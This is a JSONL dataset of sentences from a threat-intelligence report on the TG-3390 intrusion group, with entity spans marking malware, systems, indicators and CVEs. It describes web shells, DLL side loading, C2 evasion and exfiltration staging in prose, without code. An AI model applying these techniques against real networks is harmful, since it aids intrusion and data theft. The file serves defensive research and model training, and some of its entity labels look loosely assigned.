{"text": "PlugX \u2014 A remote access tool notable for communications that may contain HTTP headers starting with \" X- \" ( e.g. , \" X-Session : 0 \" ) .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 73, "end": 77, "label": "Indicator"}, {"start": 118, "end": 127, "label": "System"}]}
{"text": "Its presence on a compromised system allows a threat actor to execute a wide variety of commands , including uploading and downloading files , and spawning a reverse shell .", "spans": []}
{"text": "The malware can be configured to use multiple network protocols to avoid network-based detection .", "spans": []}
{"text": "DLL side loading is often used to maintain persistence on the compromised system .", "spans": [{"start": 0, "end": 3, "label": "System"}]}
{"text": "HttpBrowser ( also known as TokenControl ) \u2014 A backdoor notable for HTTPS communications with the HttpBrowser User-Agent .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 28, "end": 40, "label": "Malware"}, {"start": 68, "end": 73, "label": "Indicator"}, {"start": 98, "end": 109, "label": "Malware"}, {"start": 110, "end": 120, "label": "System"}]}
{"text": "HttpBrowser 's executable code may be obfuscated through structured exception handling and return-oriented programming .", "spans": [{"start": 0, "end": 11, "label": "Malware"}]}
{"text": "Its presence on a compromised system allows a threat actor to spawn a reverse shell , upload or download files , and capture keystrokes .", "spans": []}
{"text": "Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures .", "spans": [{"start": 24, "end": 35, "label": "Malware"}]}
{"text": "DLL side loading has been used to maintain persistence on the compromised system .", "spans": [{"start": 0, "end": 3, "label": "System"}]}
{"text": "ChinaChopper web shell \u2014 A web-based executable script that allows a threat actor to execute commands on the compromised system .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 13, "end": 22, "label": "System"}]}
{"text": "The server-side component provides a simple graphical user interface for threat actors interacting with web shells .", "spans": [{"start": 104, "end": 114, "label": "System"}]}
{"text": "Hunter \u2014 A web application scanning tool written by @tojen to identify vulnerabilities in Apache Tomcat , Red Hat JBoss Middleware , and Adobe ColdFusion .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 90, "end": 103, "label": "System"}, {"start": 106, "end": 130, "label": "System"}, {"start": 137, "end": 153, "label": "System"}]}
{"text": "It can also identify open ports , collect web banners , and download secondary files .", "spans": []}
{"text": "The following tools appear to be exclusive to TG-3390 : OwaAuth web shell \u2014 A web shell and credential stealer deployed to Microsoft Exchange servers .", "spans": [{"start": 46, "end": 53, "label": "Organization"}, {"start": 56, "end": 63, "label": "Malware"}, {"start": 64, "end": 73, "label": "System"}, {"start": 78, "end": 87, "label": "System"}, {"start": 103, "end": 110, "label": "System"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 133, "end": 141, "label": "System"}]}
{"text": "It is installed as an ISAPI filter .", "spans": [{"start": 22, "end": 34, "label": "System"}]}
{"text": "Captured credentials are DES encrypted using the password \" 12345678 \" and are written to the log.txt file in the root directory .", "spans": []}
{"text": "Like the ChinaChopper web shell , the OwaAuth web shell requires a password .", "spans": [{"start": 9, "end": 21, "label": "Malware"}, {"start": 22, "end": 31, "label": "System"}, {"start": 38, "end": 45, "label": "Malware"}, {"start": 46, "end": 55, "label": "System"}]}
{"text": "However , the OwaAuth web shell password contains the victim organization's name .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 22, "end": 31, "label": "System"}]}
{"text": "ASPXTool \u2014 A modified version of the ASPXSpy web shell .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 37, "end": 44, "label": "Malware"}, {"start": 45, "end": 54, "label": "System"}]}
{"text": "It is deployed to internally accessible servers running Internet Information Services ( IIS ) .", "spans": [{"start": 56, "end": 85, "label": "System"}, {"start": 88, "end": 91, "label": "System"}]}
{"text": "TG-3390 actors have also used the following publicly available tools :", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Windows Credential Editor ( WCE ) \u2014 obtains passwords from memory . gsecdump \u2014 obtains passwords from memory . winrar \u2014 compresses data for Exfiltration . nbtscan \u2014 scans NetBIOS name servers .", "spans": [{"start": 0, "end": 25, "label": "System"}, {"start": 28, "end": 31, "label": "System"}, {"start": 68, "end": 76, "label": "System"}, {"start": 111, "end": 117, "label": "System"}, {"start": 155, "end": 162, "label": "System"}, {"start": 171, "end": 178, "label": "System"}]}
{"text": "CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 34, "end": 41, "label": "Organization"}]}
{"text": "As discussed in the Actions on objectives section , the threat actors appear to wait until they have established a foothold .", "spans": []}
{"text": "TG-3390 actors use command and control ( C2 ) domains for extended periods of time but frequently change the domains' IP addresses .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 19, "end": 38, "label": "System"}, {"start": 41, "end": 43, "label": "System"}]}
{"text": "The new IP addresses are typically on the same subnet as the previous ones .", "spans": []}
{"text": "TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 30, "end": 32, "label": "System"}]}
{"text": "The most common registrar used by the adversary is HiChina Zhicheng Technology Ltd .", "spans": [{"start": 51, "end": 82, "label": "Organization"}]}
{"text": "The threat actors have a demonstrated ability to move from one network provider to another , using some infrastructure for extended periods of time and other domains for only a few days .", "spans": []}
{"text": "Seemingly random activity patterns in infrastructure deployment and usage , along with the ability to use a wide variety of geographically diverse infrastructure , help the threat actors avoid detection .", "spans": []}
{"text": "TG-3390 SWCs may be largely geographically independent , but the group's most frequently used C2 registrars and IP net blocks are located in the U.S. Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 8, "end": 12, "label": "System"}, {"start": 94, "end": 96, "label": "System"}, {"start": 169, "end": 171, "label": "System"}, {"start": 227, "end": 234, "label": "Organization"}]}
{"text": "The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": [{"start": 25, "end": 30, "label": "Malware"}, {"start": 31, "end": 34, "label": "System"}, {"start": 40, "end": 47, "label": "System"}]}
{"text": "The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": [{"start": 45, "end": 48, "label": "Organization"}]}
{"text": "The OwaAuth web shell is likely created with a builder , given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 12, "end": 21, "label": "System"}, {"start": 72, "end": 74, "label": "System"}]}
{"text": "The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 141, "end": 151, "label": "System"}]}
{"text": "TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 21, "label": "System"}, {"start": 45, "end": 51, "label": "System"}, {"start": 57, "end": 60, "label": "System"}]}
{"text": "The ZIP archives have names relevant to the targets and contain both legitimate files and malware .", "spans": [{"start": 4, "end": 7, "label": "System"}]}
{"text": "One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets , and an HttpBrowser installer disguised as an image file .", "spans": [{"start": 31, "end": 34, "label": "Organization"}, {"start": 70, "end": 73, "label": "System"}, {"start": 128, "end": 139, "label": "Malware"}, {"start": 140, "end": 149, "label": "System"}]}
{"text": "Both the redirect code on the compromised site and the exploit code appear and disappear , indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations .", "spans": [{"start": 167, "end": 170, "label": "System"}]}
{"text": "The threat actors have evolved to whitelisting IP addresses and only delivering the exploit and payload to specific targets of interest .", "spans": [{"start": 47, "end": 49, "label": "Indicator"}]}
{"text": "CTU researchers have observed TG-3390 compromising a target organization's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}, {"start": 132, "end": 135, "label": "System"}]}
{"text": "TG-3390 actors have used Java exploits in their SWCs .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 25, "end": 29, "label": "System"}, {"start": 30, "end": 38, "label": "System"}, {"start": 48, "end": 52, "label": "System"}]}
{"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HttpBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 67, "end": 80, "label": "System"}, {"start": 88, "end": 92, "label": "System"}, {"start": 93, "end": 112, "label": "System"}, {"start": 130, "end": 141, "label": "Malware"}, {"start": 142, "end": 150, "label": "System"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 175, "end": 188, "label": "System"}, {"start": 192, "end": 197, "label": "System"}]}
{"text": "In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": [{"start": 24, "end": 27, "label": "Organization"}, {"start": 42, "end": 49, "label": "Organization"}, {"start": 63, "end": 69, "label": "System"}, {"start": 132, "end": 135, "label": "System"}]}
{"text": "Hunter queried the following URIs in a specific order to determine if the associated software configurations are insecure .", "spans": [{"start": 0, "end": 6, "label": "System"}]}
{"text": "TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 13, "end": 16, "label": "System"}, {"start": 141, "end": 144, "label": "System"}]}
{"text": "CTU researchers have observed the threat actors employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 69, "end": 78, "label": "Organization"}]}
{"text": "The DLL acts as a stub loader , which loads and executes the shell code .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 23, "end": 29, "label": "System"}]}
{"text": "The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system .", "spans": [{"start": 50, "end": 55, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}]}
{"text": "Note : DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors .", "spans": [{"start": 7, "end": 10, "label": "System"}, {"start": 99, "end": 108, "label": "System"}]}
{"text": "The challenge is detecting known good software loading and running malware .", "spans": []}
{"text": "As security controls have improved , DLL side loading has evolved to load a payload stored in a different directory or from a registry value .", "spans": [{"start": 37, "end": 40, "label": "System"}]}
{"text": "In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": [{"start": 38, "end": 48, "label": "System"}]}
{"text": "TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 33, "end": 40, "label": "Malware"}, {"start": 41, "end": 50, "label": "System"}, {"start": 54, "end": 62, "label": "System"}, {"start": 93, "end": 105, "label": "System"}]}
{"text": "The IIS w3wp.exe process loads the malicious DLL , which CTU researchers have observed in the Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Bin directory .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 8, "end": 16, "label": "Indicator"}, {"start": 45, "end": 48, "label": "System"}, {"start": 57, "end": 60, "label": "Organization"}]}
{"text": "To traverse the firewall , C2 traffic for most TG-3390 tools occurs over ports 53 , 80 , and 443 .", "spans": [{"start": 16, "end": 24, "label": "System"}, {"start": 27, "end": 29, "label": "System"}, {"start": 47, "end": 54, "label": "Organization"}]}
{"text": "The PlugX malware can be configured to use HTTP , DNS , raw TCP , or UDP to avoid network-based detection .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 43, "end": 47, "label": "Indicator"}, {"start": 50, "end": 53, "label": "Indicator"}, {"start": 60, "end": 63, "label": "Indicator"}, {"start": 69, "end": 72, "label": "Indicator"}]}
{"text": "In one sample analyzed by CTU researchers , PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication .", "spans": [{"start": 26, "end": 29, "label": "Organization"}, {"start": 44, "end": 49, "label": "Malware"}]}
{"text": "Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications .", "spans": [{"start": 6, "end": 17, "label": "Malware"}, {"start": 31, "end": 34, "label": "Indicator"}]}
{"text": "TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127.0.0.1 , which is a variation of a technique known as \" parking \" .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 37, "end": 39, "label": "System"}, {"start": 83, "end": 85, "label": "Indicator"}, {"start": 94, "end": 103, "label": "Indicator"}]}
{"text": "Other variations of parking point the IP address to Google 's recursive name server 8.8.8.8 , an address belonging to Confluence , or to other non-routable addresses .", "spans": [{"start": 38, "end": 40, "label": "Indicator"}, {"start": 52, "end": 58, "label": "Organization"}]}
{"text": "When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": [{"start": 86, "end": 88, "label": "System"}]}
{"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 55, "end": 62, "label": "Organization"}]}
{"text": "After compromising an initial victim's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim's organization name .", "spans": [{"start": 88, "end": 93, "label": "Organization"}]}
{"text": "They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": [{"start": 23, "end": 31, "label": "System"}, {"start": 66, "end": 73, "label": "Malware"}, {"start": 74, "end": 83, "label": "System"}]}
{"text": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , the adversaries identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": [{"start": 7, "end": 14, "label": "Malware"}, {"start": 15, "end": 24, "label": "System"}, {"start": 176, "end": 188, "label": "Malware"}, {"start": 189, "end": 199, "label": "System"}]}
{"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": []}
{"text": "The threat actors use the Hunter and nbtscan tools , sometimes renamed , to conduct network reconnaissance for vulnerable servers and online systems .", "spans": [{"start": 26, "end": 32, "label": "System"}, {"start": 37, "end": 44, "label": "System"}]}
{"text": "TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 21, "end": 27, "label": "Indicator"}]}
{"text": "Over a few days' span , the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance .", "spans": []}
{"text": "They use At.exe to schedule tasks to run self-extracting RAR archives , which install either HttpBrowser or PlugX .", "spans": [{"start": 9, "end": 15, "label": "Indicator"}, {"start": 57, "end": 60, "label": "System"}, {"start": 93, "end": 104, "label": "Malware"}, {"start": 108, "end": 113, "label": "Malware"}]}
{"text": "CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 60, "end": 63, "label": "System"}, {"start": 120, "end": 123, "label": "System"}]}
{"text": "To facilitate lateral movement , the adversaries deploy ASPXTool web shells to internally accessible systems running IIS .", "spans": [{"start": 56, "end": 64, "label": "System"}, {"start": 65, "end": 75, "label": "System"}, {"start": 117, "end": 120, "label": "System"}]}
{"text": "CTU researchers have observed the threat actors encrypting data using the password \" admin-windows2014 \" and splitting the RAR archives into parts in the recycler directory , with the same name as the uncompressed data .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 123, "end": 126, "label": "System"}]}
{"text": "The number at the end of the password corresponds to the year of the intrusion .", "spans": []}
{"text": "For example , the password \" admin-windows2014 \" shown in Figure 14 was changed to \"admin-windows2015\" for TG-3390 intrusions conducted in 2015 .", "spans": [{"start": 107, "end": 114, "label": "Organization"}]}
{"text": "CTU researchers have observed TG-3390 actors staging RAR archives , renamed with a .zip file extension , on externally accessible web servers .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}, {"start": 53, "end": 56, "label": "System"}, {"start": 83, "end": 87, "label": "Indicator"}]}
{"text": "The adversaries then issue HTTP GET requests , sometimes with the User-Agent MINIXL , to exfiltrate the archive parts from the victim's network .", "spans": [{"start": 27, "end": 31, "label": "Indicator"}, {"start": 66, "end": 76, "label": "System"}, {"start": 77, "end": 83, "label": "System"}]}
{"text": "Successfully evicting TG-3390 from an environment requires a coordinated plan to remove all access points , including remote access tools and web shells .", "spans": [{"start": 22, "end": 29, "label": "Organization"}, {"start": 118, "end": 137, "label": "System"}, {"start": 142, "end": 152, "label": "System"}]}
{"text": "Within weeks of eviction , the threat actors attempt to access their ChinaChopper web shells from previously used IP addresses .", "spans": [{"start": 69, "end": 81, "label": "Malware"}, {"start": 82, "end": 92, "label": "System"}, {"start": 114, "end": 116, "label": "Indicator"}]}
{"text": "Finding the web shells inaccessible , the adversaries search google.co.jp for remote access solutions .", "spans": [{"start": 12, "end": 22, "label": "System"}, {"start": 61, "end": 73, "label": "Indicator"}]}
{"text": "CTU researchers discovered the threat actors searching for \" [company] login , \" which directed them to the landing page for remote access .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "TG-3390 attempts to reenter the environment by identifying accounts that do not require two-factor authentication for remote access solutions , and then brute forcing usernames and passwords .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": [{"start": 69, "end": 77, "label": "System"}, {"start": 82, "end": 85, "label": "System"}, {"start": 131, "end": 138, "label": "Organization"}]}
{"text": "CTU researchers believe legitimate websites are used to host tools because web proxies categorize the sites as benign .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 51, "end": 59, "label": "System"}, {"start": 60, "end": 70, "label": "System"}, {"start": 151, "end": 160, "label": "System"}, {"start": 173, "end": 184, "label": "Malware"}, {"start": 188, "end": 193, "label": "Malware"}]}
{"text": "After reentering an environment , the threat actors focus on obtaining the active directory contents .", "spans": []}
{"text": "TG-3390 is known for compromising organizations via SWCs and moving quickly to install backdoors on Exchange servers .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 52, "end": 56, "label": "System"}, {"start": 100, "end": 108, "label": "System"}]}
{"text": "Despite the group's proficiency , there are still many opportunities to detect and disrupt its operation by studying its modus operandi .", "spans": []}
{"text": "The threat actors work to overcome existing security controls , or those put in place during an engagement , to complete their mission of exfiltrating intellectual property .", "spans": []}
{"text": "Due to TG-3390 's determination , organizations should formulate a solid eviction plan before engaging with the threat actors to prevent them from reentering the network .", "spans": [{"start": 7, "end": 14, "label": "Organization"}]}